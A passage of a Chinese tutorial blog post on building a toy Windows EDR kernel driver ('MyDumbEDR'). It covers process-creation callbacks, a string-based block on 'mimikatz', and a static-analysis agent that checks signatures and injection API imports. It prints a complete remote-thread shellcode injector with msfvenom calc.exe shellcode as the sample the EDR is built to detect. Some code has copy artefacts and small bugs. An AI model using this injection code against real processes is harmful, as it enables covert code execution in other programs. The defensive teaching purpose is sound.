参考:

https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/

 

环境搭建

前言:此处所说不一定正确,但是在本机成功运行了。

如果本机已经装过VS了,还是去虚拟机里面用新的环境吧,不同的SDK好像会出现奇奇怪怪的BUG,直接用虚拟机还快一点。

VS下载

想要编写的驱动运行在不同版本的Windows上,需要下载不同版本的VS。详见https://learn.microsoft.com/zh-cn/windows-hardware/drivers/other-wdk-downloads

我的虚拟机是Windows 10,使用winver查看详细的版本是19045.4651

根据上面链接的windows wdk环境搭建教程,win10 1903 用Enterprise 2019,安装Enterprise 2019就好。

SDK下载

根据windows教程,在安装VS的时候选择C++桌面开发就行

WDK安装

同样根据提示下载1903的WDK就行

下载之后,右键在详细信息里面确认一下版本是不是对的,这里好像有个BUG,1903版本不是1904的,要下2004的版本才是1904的

驱动编写

初始准备

上面的环境搞好之后,创建项目选择KMDF(Kenel Mode Driver Empty)

生成效果如下

然后在项目属性里面把spectre 缓解给关了

DebugPrintex 与过滤器

与普通的程序不同,驱动只能通过Debugprint和Windbg进行调试。

https://learn.microsoft.com/zh-cn/windows-hardware/drivers/ddi/wdm/nf-wdm-dbgprintex

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Initializing the driver\n”);

第一个参数是设置筛选器的ID,第二个是信息的严重性,后续就是常规的printf参数了。

现在设置筛选器为DPFLTR_IHVDRIVER_ID,建个注册表

\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

设置DWORD的名称为IHVDRIVER,值设置为f就是1111。

第三个参数就是对应的偏移量,ERROR_LEVEL是0,表示1<<0,INFO_LEVEL是3表示1<<3。偏移之后且上对应的过滤器的值,就是注册表设置的,我现在设置IHVDRIVER为4,所以就是0100&0xffff,如果且出现最后不为0,就会显示在Dbg中显示对应的信息。

代码

在Source File里面加一个Driver.c内容如下



#include <Ntifs.h>

#include <ntddk.h>

#include <wdf.h>


// Global variables

UNICODE_STRING DEVICE_NAME = RTL_CONSTANT_STRING(L”\\Device\\MyDumbEDR”); // Driver device name

UNICODE_STRING SYM_LINK = RTL_CONSTANT_STRING(L”\\??\\MyDumbEDR”); // Device symlink


void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “MyDumbEDR: Unloading routine called\n”);

// Delete the driver device

IoDeleteDevice(DriverObject->DeviceObject);

// Delete the symbolic link

IoDeleteSymbolicLink(&SYM_LINK);

}


NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {

// Prevent compiler error in level 4 warnings

UNREFERENCED_PARAMETER(RegistryPath);


DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Initializing the driver\n”);


// Variable that will store the output of WinAPI functions

NTSTATUS status;


// Initializing a device object and creating it

PDEVICE_OBJECT DeviceObject;

UNICODE_STRING deviceName = DEVICE_NAME;

UNICODE_STRING symlinkName = SYM_LINK;

status = IoCreateDevice(

DriverObject, // Our driver object

0, // Extra bytes needed (we don’t need any)

&deviceName, // The device name

FILE_DEVICE_UNKNOWN, // The device type

0, // Device characteristics (none)

FALSE, // Sets the driver to not exclusive

&DeviceObject // Pointer in which is stored the result of IoCreateDevice

);


if (!NT_SUCCESS(status)) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Device 11111111111111creation failed\n”);

return status;

}


// Creating the symlink that we will use to contact our driver

status = IoCreateSymbolicLink(

&symlinkName, // The symbolic link name

&deviceName // The device name

);


if (!NT_SUCCESS(status)) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Symlink creation failed\n”);

IoDeleteDevice(DeviceObject);

return status;

}


// Setting the unload routine to execute

DriverObject->DriverUnload = UnloadMyDumbEDR;


return status;

}

创建和启动驱动的命令

这里我是直接开机的时候F8把驱动签名校验关了

sc.exe create MyDumbEDR type=kernel binPath=C:\\Users\windev\Desktop\x64\Debug\MyDumbEDR.sys

sc.exe start MyDumbEDR

Dbg输出效果

接着来看看代码

首先是DriverEntry这个相当于普通C语言中的main函数,是所有驱动加载的入口。

DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath)

第一个是指向DriverObject的指针,包含了当前驱动的相关信息。

//0x150 bytes (sizeof)
struct _DRIVER_OBJECT
{
    SHORT Type;                                                                    //0x0
    SHORT Size;                                                                    //0x2
    struct _DEVICE_OBJECT* DeviceObject;                                           //0x8
    ULONG Flags;                                                                   //0x10
    VOID* DriverStart;                                                             //0x18
    ULONG DriverSize;                                                              //0x20
    VOID* DriverSection;                                                           //0x28
    struct _DRIVER_EXTENSION* DriverExtension;                                     //0x30
    struct _UNICODE_STRING DriverName;                                             //0x38
    struct _UNICODE_STRING* HardwareDatabase;                                      //0x48
    struct _FAST_IO_DISPATCH* FastIoDispatch;                                      //0x50
    LONG (*DriverInit)(struct _DRIVER_OBJECT* arg1, struct _UNICODE_STRING* arg2); //0x58
    VOID (*DriverStartIo)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);         //0x60
    VOID (*DriverUnload)(struct _DRIVER_OBJECT* arg1);                             //0x68
    LONG (*MajorFunction[28])(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);     //0x70
};

第二个参数是指向驱动参数的指针,一般在注册表HKLM:\SYSTEM\CurrentControlSet\Service里面。

继续看后续代码,首先是IoCreateDevice函数。通过这个函数为驱动创建了一个Device设备,具体不了解但是需要注意的点是DeviceName这个参数。指的是当前驱动的名称,这里设置的是

\Device\MyDumbEDR。前面的\Dervice是NT设备名称的格式,所以实际上创建的驱动设备名称就是MyDumbEDR。通过Winobj64也可以发现驱动名称为MyDumbEDR

之后第二个函数是IoCreateSymbolicLink,创建一个符号链接与驱动设备绑定。这里的symbol名称为\\??\\MyDumbEDR。用户层与内核层的驱动通信就是通过symbol名称通信。

status = IoCreateSymbolicLink(
&symlinkName, // The symbolic link name
&deviceName // The device name
);

第三个就是设置驱动卸载时的回调函数。在回调函数中删除了,驱动设备与符号链接

DriverObject->DriverUnload = UnloadMyDumbEDR;

void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {
DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “MyDumbEDR: Unloading routine called\n”);
// Delete the driver device
IoDeleteDevice(DriverObject->DeviceObject);
// Delete the symbolic link
IoDeleteSymbolicLink(&SYM_LINK);
}

回调函数

微软为了保证系统的安全,设置了Patch Guard,定时监测内核中特定区域的完整性,如果被篡改就直接蓝屏。通过这种方式之前厂商使用SSDT Hook内核变得困难。微软提出了新的方式给安全厂商使用,那就是内核回调。通过设置不同的内核回调函数,安全厂商可以实现文件、注册表、线程、运行程序等许多地方的监控,每当程序运行对应的函数前,需要先执行回调函数。这几个是常见的回调函数

  • PsSetCreateProcessNotifyRoutine: 监视进程创建
  • PsSetLoadImageNotifyRoutine: DLL加载
  • PsSetThreadCreateNotifyRoutine: 线程创建
  • ObRegisterCallbacks: 打开线程、打开进程、打开桌面
  • CmRegisterCallbacks: 监测注册表相关行为
  • IoRegisterFsRegistrationChange: monitor the modification of a file

以PsSetCreateProcessNotifyRoutine为例查看如何设置回调:

NTSTATUS PsSetCreateProcessNotifyRoutine(
    PCREATE_PROCESS_NOTIFY_ROUTINE NotifyRoutine, // Pointer to the function to execute when a process is created
    BOOLEAN                        Remove         // Whether the routine specified by NotifyRoutine should be added to or removed from the system's list of notification routines
);

 

第一个参数为指向回调函数的指针,第二个参数判断是否添加或者删除对应的回调函数。

对应的回调函数定义如下:

void PcreateProcessNotifyRoutine( [in] HANDLE ParentId, [in] HANDLE ProcessId, [in] BOOLEAN Create )

三个参数分别为父进程ID、当前进程ID、与当前这个进程是被创建(True)还是被删除(False)。

完整的代码修改为



#include <Ntifs.h>

#include <ntddk.h>

#include <wdf.h>


// Global variables

UNICODE_STRING DEVICE_NAME = RTL_CONSTANT_STRING(L”\\Device\\MyDumbEDR”); // Driver device name

UNICODE_STRING SYM_LINK = RTL_CONSTANT_STRING(L”\\??\\MyDumbEDR”); // Device symlink


void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “MyDumbEDR: Unloading routine called\n”);


    // Unset the callback




    PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, TRUE);


// Delete the driver device

IoDeleteDevice(DriverObject->DeviceObject);

// Delete the symbolic link

IoDeleteSymbolicLink(&SYM_LINK);

}


void CreateProcessNotifyRoutine(HANDLE ppid, HANDLE pid, BOOLEAN create) {

if (create) {

PEPROCESS process = NULL;

PUNICODE_STRING processName = NULL;


// Retrieve process ID

PsLookupProcessByProcessId(pid, &process);


// Retrieve the process name from the EPROCESS structure

SeLocateProcessImageName(process, &processName);


DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: %d (%wZ) launched.\n”, pid, processName);

}

else {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: %d got killed.\n”, pid);

}

}


NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {

// Prevent compiler error in level 4 warnings

UNREFERENCED_PARAMETER(RegistryPath);


DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Initializing the driver\n”);


// Variable that will store the output of WinAPI functions

NTSTATUS status;


// Initializing a device object and creating it

PDEVICE_OBJECT DeviceObject;

UNICODE_STRING deviceName = DEVICE_NAME;

UNICODE_STRING symlinkName = SYM_LINK;

status = IoCreateDevice(

DriverObject, // Our driver object

0, // Extra bytes needed (we don’t need any)

&deviceName, // The device name

FILE_DEVICE_UNKNOWN, // The device type

0, // Device characteristics (none)

FALSE, // Sets the driver to not exclusive

&DeviceObject // Pointer in which is stored the result of IoCreateDevice

);


if (!NT_SUCCESS(status)) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Device 11111111111111creation failed\n”);

return status;

}


// Creating the symlink that we will use to contact our driver

status = IoCreateSymbolicLink(

&symlinkName, // The symbolic link name

&deviceName // The device name

);


if (!NT_SUCCESS(status)) {

DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Symlink creation failed\n”);

IoDeleteDevice(DeviceObject);

return status;

}


PsSetCreateProcessNotifyRoutine(CreateProcessNotifyRoutine, FALSE);


// Setting the unload routine to execute

DriverObject->DriverUnload = UnloadMyDumbEDR;


return status;

}

回调函数设置了,每当有进程创建或者被删除就会输出进程名称

 

 

  1. void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {
  2.     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “MyDumbEDR: Unloading routine called\n”);
  3.     // Delete the driver device 
  4.     IoDeleteDevice(DriverObject->DeviceObject);
  5.     // Delete the symbolic link
  6.     IoDeleteSymbolicLink(&SYM_LINK);
  7. }

同时注意在UnloadEDR的回调中,设置了对应回调的删除。

PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, TRUE); 现在的驱动只能监测进程的创建与删除,不能拦截进程是否创建。 拦截进程创建需要另外的函数
NTSTATUS PsSetCreateProcessNotifyRoutineEx(
    PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, // Pointer to the PCreateProcessNotifyRoutineEx structure
    BOOLEAN                           Remove         // Whether or not we should add or remove the callback
); 这里的规则与PsSetCreateProcessNotifyRoutine类似,不同的点在回调函数上。
typedef struct _PS_CREATE_NOTIFY_INFO {
    SIZE_T              Size;
    union {
        ULONG Flags;
        struct {
            ULONG FileOpenNameAvailable : 1;  //
            ULONG IsSubsystemProcess : 1;     
            ULONG Reserved : 30;
        };
    };
    HANDLE              ParentProcessId;     // Parent PID
    CLIENT_ID           CreatingThreadId;    // Thread id 
    struct _FILE_OBJECT *FileObject; 
    PCUNICODE_STRING    ImageFileName;       // Name of the binary
    PCUNICODE_STRING    CommandLine;         // Arguments passed to the binary
    NTSTATUS            CreationStatus;      // This variable holds whether or not the process should be created
} PS_CREATE_NOTIFY_INFO, *PPS_CREATE_NOTIFY_INFO; 如果将最后的NTSTATUS设置为对应的错误代码,进程就不会被创建。 这里把代码改为
  1. #include <Ntifs.h>
  2. #include <ntddk.h>
  3. #include <wdf.h>
  5. // Global variables
  6. UNICODE_STRING DEVICE_NAME = RTL_CONSTANT_STRING(L“\\Device\\MyDumbEDR”); // Driver device name
  7. UNICODE_STRING SYM_LINK = RTL_CONSTANT_STRING(L“\\??\\MyDumbEDR”);        // Device symlink
  12. void CreateProcessNotifyRoutine(PEPROCESS process, HANDLE pid, PPS_CREATE_NOTIFY_INFO createInfo) {
  13.     UNREFERENCED_PARAMETER(process);
  14.     UNREFERENCED_PARAMETER(pid);
  16.     // Never forget this if check because if you don’t, you’ll end up crashing your Windows system ;P
  17.     if (createInfo != NULL) {
  18.         // Compare the command line of the launched process to the notepad string
  19.         if (wcsstr(createInfo->CommandLine->Buffer, L“notepad”) != NULL) {
  20.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Process (%ws) allowed.\n”, createInfo->CommandLine->Buffer);
  21.             // Process allowed
  22.             createInfo->CreationStatus = STATUS_SUCCESS;
  23.         }
  25.         // Compare the command line of the launched process to the mimikatz string
  26.         if (wcsstr(createInfo->CommandLine->Buffer, L“mimikatz”) != NULL) {
  27.             DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Process (%ws) denied.\n”, createInfo->CommandLine->Buffer);
  28.             // Process denied
  29.             createInfo->CreationStatus = STATUS_ACCESS_DENIED;
  30.         }
  31.     }
  32. }
  34. void UnloadMyDumbEDR(_In_ PDRIVER_OBJECT DriverObject) {
  35.     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, “MyDumbEDR: Unloading routine called\n”);
  37.     PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, TRUE);
  38.     // Delete the driver device 
  39.     IoDeleteDevice(DriverObject->DeviceObject);
  40.     // Delete the symbolic link
  41.     IoDeleteSymbolicLink(&SYM_LINK);
  42. }
  45. NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath) {
  46.     // Prevent compiler error in level 4 warnings
  47.     UNREFERENCED_PARAMETER(RegistryPath);
  49.     DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Initializing the driver\n”);
  51.     // Variable that will store the output of WinAPI functions
  52.     NTSTATUS status;
  54.     // Initializing a device object and creating it
  55.     PDEVICE_OBJECT DeviceObject;
  56.     UNICODE_STRING deviceName = DEVICE_NAME;
  57.     UNICODE_STRING symlinkName = SYM_LINK;
  58.     status = IoCreateDevice(
  59.         DriverObject,      // Our driver object
  60.         0,         // Extra bytes needed (we don’t need any)
  61.         &deviceName,            // The device name
  62.         FILE_DEVICE_UNKNOWN,    // The device type
  63.         0,         // Device characteristics (none)
  64.         FALSE,        // Sets the driver to not exclusive
  65.         &DeviceObject      // Pointer in which is stored the result of IoCreateDevice
  66.     );
  68.     if (!NT_SUCCESS(status)) {
  69.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Device 11111111111111creation failed\n”);
  70.         return status;
  71.     }
  73.     // Creating the symlink that we will use to contact our driver
  74.     status = IoCreateSymbolicLink(
  75.         &symlinkName, // The symbolic link name
  76.         &deviceName   // The device name
  77.     );
  79.     if (!NT_SUCCESS(status)) {
  80.         DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, “MyDumbEDR: Symlink creation failed\n”);
  81.         IoDeleteDevice(DeviceObject);
  82.         return status;
  83.     }
  85.     PsSetCreateProcessNotifyRoutineEx(CreateProcessNotifyRoutine, FALSE);
  87.     // Setting the unload routine to execute
  88.     DriverObject->DriverUnload = UnloadMyDumbEDR;
  90.     return status;
  91. }
直接加载会报错误 STATUS_ACCESS_DENIED,需要在编译选项中加入/integritycheck,当使用/integritycheck这个选项。会在PE或者DLL头部加入 IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY 这个头部。当windows检查到程序存在这个头部后,在运行或者加载前检查对应的数字签名,如果没有签名不会加载。
现在windbg中就会记录所有启动的应用程序。
如果将程序名称为mimkatze.exe,运行就会被驱动拦截无法启动。
现在这个驱动可以拦截mimkatze.exe,但是很是很蠢只能检测程序名称,如果改个名字就可以绕过去了。

升级驱动

现在升级一下这个驱动,让它更加接近真实的EDR,偷张图

E

跟刚刚别编写的EDR,在线程创建的过程中使用了Dll 注入,然后判断是否存在问题,在让EDR判断这个进程是否应该被启动。接着以下面这段远程注入代码举例,如何检查。

  1. #include “stdio.h”
  2. #include <Windows.h>
  3. #include <TlHelp32.h>
  5. int get_process_id_from_szexefile(wchar_t processName[]) {
  6.  PROCESSENTRY32 entry = { 0 };
  7.  entry.dwSize = sizeof(PROCESSENTRY32);
  8.  HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
  9.  if (Process32First(snapshot, &entry) == TRUE) {
  10.   while (Process32Next(snapshot, &entry) == TRUE) {
  11.    if (wcscmp(entry.szExeFile, processName) == 0) {
  12.     return entry.th32ProcessID;
  13.    }
  14.   }
  15.  }
  16.  else {
  17.   printf(“CreateToolhelper32Snapshot failed : %d\n”, GetLastError());
  18.   exit(1);
  19.  }
  20.  printf(“Process not found.\n”);
  21.  exit(1);
  22. }
  24. void check_if_se_debug_privilege_is_enabled() {
  25.  HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId());
  26.  HANDLE hToken;
  27.  OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
  28.  DWORD cbSize;
  29.  GetTokenInformation(hToken, TokenIntegrityLevel, NULL0, &cbSize);
  30.  PTOKEN_MANDATORY_LABEL pTIL = (PTOKEN_MANDATORY_LABEL)LocalAlloc(0, cbSize);
  31.  GetTokenInformation(hToken, TokenIntegrityLevel, pTIL, cbSize, &cbSize);
  32.  DWORD current_process_integrity = (DWORD)*GetSidSubAuthority(pTIL->Label.Sid, (DWORD)(UCHAR)(*GetSidSubAuthorityCount(pTIL->Label.Sid) – 1));
  34.  TOKEN_PRIVILEGES tp;
  36.  LUID luidSeDebugPrivilege;
  37.  if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luidSeDebugPrivilege) == 0) {
  38.   printf(“SeDebugPrivilege not owned\n”);
  39.  }
  40.  else {
  41.   printf(“SeDebugPrivilege owned\n”);
  42.  }
  43.  tp.PrivilegeCount = 1;
  44.  tp.Privileges[0].Luid = luidSeDebugPrivilege;
  45.  tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  46.  if (AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULLNULL) == 0) {
  47.   printf(“SeDebugPrivilege adjust token failed: %d\n”, GetLastError());
  48.  }
  49.  else {
  50.   printf(“SeDebugPrivilege enabled.\n”);
  51.  }
  53.  CloseHandle(hProcess);
  54.  CloseHandle(hToken);
  55. }
  57. int main() {
  58.  printf(“Launching remote shellcode injection\n”);
  59.  
  60.  // DO NOT REMOVE
  61.  // When loading a DLL remotely, its content won’t apply until all DLL’s are loaded
  62.  // For some reason it leads to a race condition which is not part of the challenge
  63.  // Hence do not remove the Sleep (even if it’d allow you bypassing the hooks)
  64.  Sleep(5000);
  65.  // DO NOT REMOVE
  66.  check_if_se_debug_privilege_is_enabled();
  67.  wchar_t processName[] = L”notepad.exe”;
  68.  int processId = get_process_id_from_szexefile(processName);
  69.  printf(“Injecting to PID: %i\n”, processId);
  70.  HANDLE processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(processId));
  71.  
  72.  
  73.  // msfvenom -p windows/x64/exec CMD=calc.exe -b “\x00\x0a\0d” -f c
  74.  unsigned char shellcode[] =
  75.   “\x48\x31\xc9\x48\x81\xe9\xdb\xff\xff\xff\x48\x8d\x05\xef\xff”
  76.   “\xff\xff\x48\xbb\x33\xef\x18\x46\xf8\x06\x62\xef\x48\x31\x58”
  77.   “\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xcf\xa7\x9b\xa2\x08\xee”
  78.   “\xa2\xef\x33\xef\x59\x17\xb9\x56\x30\xbe\x65\xa7\x29\x94\x9d”
  79.   “\x4e\xe9\xbd\x53\xa7\x93\x14\xe0\x4e\xe9\xbd\x13\xa7\x93\x34”
  80.   “\xa8\x4e\x6d\x58\x79\xa5\x55\x77\x31\x4e\x53\x2f\x9f\xd3\x79”
  81.   “\x3a\xfa\x2a\x42\xae\xf2\x26\x15\x07\xf9\xc7\x80\x02\x61\xae”
  82.   “\x49\x0e\x73\x54\x42\x64\x71\xd3\x50\x47\x28\x8d\xe2\x67\x33”
  83.   “\xef\x18\x0e\x7d\xc6\x16\x88\x7b\xee\xc8\x16\x73\x4e\x7a\xab”
  84.   “\xb8\xaf\x38\x0f\xf9\xd6\x81\xb9\x7b\x10\xd1\x07\x73\x32\xea”
  85.   “\xa7\x32\x39\x55\x77\x31\x4e\x53\x2f\x9f\xae\xd9\x8f\xf5\x47”
  86.   “\x63\x2e\x0b\x0f\x6d\xb7\xb4\x05\x2e\xcb\x3b\xaa\x21\x97\x8d”
  87.   “\xde\x3a\xab\xb8\xaf\x3c\x0f\xf9\xd6\x04\xae\xb8\xe3\x50\x02”
  88.   “\x73\x46\x7e\xa6\x32\x3f\x59\xcd\xfc\x8e\x2a\xee\xe3\xae\x40”
  89.   “\x07\xa0\x58\x3b\xb5\x72\xb7\x59\x1f\xb9\x5c\x2a\x6c\xdf\xcf”
  90.   “\x59\x14\x07\xe6\x3a\xae\x6a\xb5\x50\xcd\xea\xef\x35\x10\xcc”
  91.   “\x10\x45\x0e\x42\x07\x62\xef\x33\xef\x18\x46\xf8\x4e\xef\x62”
  92.   “\x32\xee\x18\x46\xb9\xbc\x53\x64\x5c\x68\xe7\x93\x43\xf6\xd7”
  93.   “\x4d\x65\xae\xa2\xe0\x6d\xbb\xff\x10\xe6\xa7\x9b\x82\xd0\x3a”
  94.   “\x64\x93\x39\x6f\xe3\xa6\x8d\x03\xd9\xa8\x20\x9d\x77\x2c\xf8”
  95.   “\x5f\x23\x66\xe9\x10\xcd\x05\xc2\x5a\x35\x86\x5d\x8b\x77\x31”
  96.   “\x8b\x5a\x31\x96\x40\x9b\x7d\x2b\xcb\x34\x3e\x8c\x52\x83\x7b”
  97.   “\x68\x9d\x7e\x07\xef”;
  98.     printf(“VirtualAllocEx\n”);
  99.  PVOID remoteBuffer = VirtualAllocEx(processHandle, NULLsizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  100.  
  101.  printf(“WriteProcessMemory\n”);
  102.  WriteProcessMemory(processHandle, remoteBuffer, shellcode, sizeof(shellcode), NULL);
  103.  
  104.  printf(“CreateRemoteThread\n”);
  105.  HANDLE remoteThread = CreateRemoteThread(processHandle, NULL0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL0NULL);
  106.  
  107.  printf(“Congratz dude! The flag is MyDumbEDR{H4ckTH3W0rld}\n”);
  108.  printf(“Expect more checks in the upcoming weeks ;)\n”);
  109.  CloseHandle(processHandle);
  110.  return 0;
  111. }

这个恶意程序通过远程线程注入,将启动计算器的shellcode注入到记事本中。为了检测这个,为EDR创建两个Ring3的Agent,通过管道与驱动通信。两个Agent分别做静态检查和动态检查。

静态分析

静态分析的Agent就检查三件事

  1. 程序是否签名
  2. 程序导入表中是否存在注入的三个函数
  3. 程序中是否出现 SeDebugPrivilege字符串

下面放上代码

  1. #include <stdio.h>
  2. #include <windows.h>
  3. #include <dbghelp.h>
  4. #include <wintrust.h>
  5. #include <Softpub.h>
  6. #include <wincrypt.h>
  8. #pragma comment (lib, “wintrust.lib”)
  9. #pragma comment(lib, “dbghelp.lib”)
  10. #pragma comment(lib, “crypt32.lib”)
  12. #define MESSAGE_SIZE 2048
  14. BOOL VerifyEmbeddedSignature(const wchar_t* binaryPath) {
  15.     LONG lStatus;
  16.     WINTRUST_FILE_INFO FileData;
  17.     memset(&FileData, 0sizeof(FileData));
  18.     FileData.cbStruct = sizeof(WINTRUST_FILE_INFO);
  19.     FileData.pcwszFilePath = binaryPath;
  20.     FileData.hFile = NULL;
  21.     FileData.pgKnownSubject = NULL;
  22.     GUID WVTPolicyGUID = WINTRUST_ACTION_GENERIC_VERIFY_V2;
  23.     WINTRUST_DATA WinTrustData;
  25.     // Initializing necessary structures
  26.     memset(&WinTrustData, 0sizeof(WinTrustData));
  27.     WinTrustData.cbStruct = sizeof(WinTrustData);
  28.     WinTrustData.pPolicyCallbackData = NULL;
  29.     WinTrustData.pSIPClientData = NULL;
  30.     WinTrustData.dwUIChoice = WTD_UI_NONE;
  31.     WinTrustData.fdwRevocationChecks = WTD_REVOKE_NONE;
  32.     WinTrustData.dwUnionChoice = WTD_CHOICE_FILE;
  33.     WinTrustData.dwStateAction = WTD_STATEACTION_VERIFY;
  34.     WinTrustData.hWVTStateData = NULL;
  35.     WinTrustData.pwszURLReference = NULL;
  36.     WinTrustData.dwUIContext = 0;
  37.     WinTrustData.pFile = &FileData;
  39.     // WinVerifyTrust verifies signatures as specified by the GUID and Wintrust_Data.
  40.     lStatus = WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData);
  42.     BOOL isSigned;
  43.     switch (lStatus) {
  44.         // The file is signed and the signature was verified
  45.     case ERROR_SUCCESS:
  46.         isSigned = TRUE;
  47.         break;
  49.         // File is signed but the signature is not verified or is not trusted
  50.     case TRUST_E_SUBJECT_FORM_UNKNOWN || TRUST_E_PROVIDER_UNKNOWN || TRUST_E_EXPLICIT_DISTRUST || CRYPT_E_SECURITY_SETTINGS || TRUST_E_SUBJECT_NOT_TRUSTED:
  51.         isSigned = TRUE;
  52.         break;
  54.         // The file is not signed
  55.     case TRUST_E_NOSIGNATURE:
  56.         isSigned = FALSE;
  57.         break;
  59.         // Shouldn’t happen but hey may be!
  60.     default:
  61.         isSigned = FALSE;
  62.         break;
  63.     }
  65.     // Any hWVTStateData must be released by a call with close.
  66.     WinTrustData.dwStateAction = WTD_STATEACTION_CLOSE;
  67.     WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData);
  69.     return isSigned;
  70. }
  72. BOOL ListImportedFunctions(const wchar_t* binaryPath) {
  73.     BOOL isOpenProcessPresent = FALSE;
  74.     BOOL isVirtualAllocExPresent = FALSE;
  75.     BOOL isWriteProcessMemoryPresent = FALSE;
  76.     BOOL isCreateRemoteThreadPresent = FALSE;
  77.     // Load the target binary so that we can parse its content
  78.     HMODULE hModule = LoadLibraryEx(binaryPath, NULL, DONT_RESOLVE_DLL_REFERENCES);
  79.     if (hModule != NULL) {
  80.         // Get NT headers from the binary
  81.         IMAGE_NT_HEADERS* ntHeaders = ImageNtHeader(hModule);
  82.         if (ntHeaders != NULL) {
  83.             // Locate the IAT
  84.             IMAGE_IMPORT_DESCRIPTOR* importDesc = (IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)hModule + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  85.             // Loop over the DLL’s
  86.             while (importDesc->Name != 0) {
  87.                 const char* moduleName = (const char*)((BYTE*)hModule + importDesc->Name);
  89.                 // Loop over the functions of the DLL
  90.                 IMAGE_THUNK_DATA* thunk = (IMAGE_THUNK_DATA*)((BYTE*)hModule + importDesc->OriginalFirstThunk);
  91.                 while (thunk->u1.AddressOfData != 0) {
  92.                     if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) {
  93.                         // printf(“\tOrdinal: %llu\n”, IMAGE_ORDINAL(thunk->u1.Ordinal));
  94.                     }
  95.                     else {
  96.                         IMAGE_IMPORT_BY_NAME* importByName = (IMAGE_IMPORT_BY_NAME*)((BYTE*)hModule + thunk->u1.AddressOfData);
  97.                         // printf(“\tFunction: %s\n”, importByName->Name);
  98.                         // Checks if the following functions are used by the binary
  100.                         if (strcmp(“OpenProcess”, importByName->Name) == 0) {
  101.                             isOpenProcessPresent = TRUE;
  102.                         }
  104.                         if (strcmp(“VirtualAllocEx”, importByName->Name) == 0) {
  105.                             isVirtualAllocExPresent = TRUE;
  106.                         }
  108.                         if (strcmp(“WriteProcessMemory”, importByName->Name) == 0) {
  109.                             isWriteProcessMemoryPresent = TRUE;
  110.                         }
  112.                         if (strcmp(“CreateRemoteThread”, importByName->Name) == 0) {
  113.                             isCreateRemoteThreadPresent = TRUE;
  114.                         }
  116.                     }
  117.                     thunk++;
  118.                 }
  119.                 importDesc++;
  120.             }
  121.             FreeLibrary(hModule);
  122.         }
  123.         FreeLibrary(hModule);
  124.     }
  126.     if (isOpenProcessPresent && isVirtualAllocExPresent && isWriteProcessMemoryPresent && isCreateRemoteThreadPresent) {
  127.         return TRUE;
  128.     }
  129.     else {
  130.         return FALSE;
  131.     }
  132.     return FALSE;
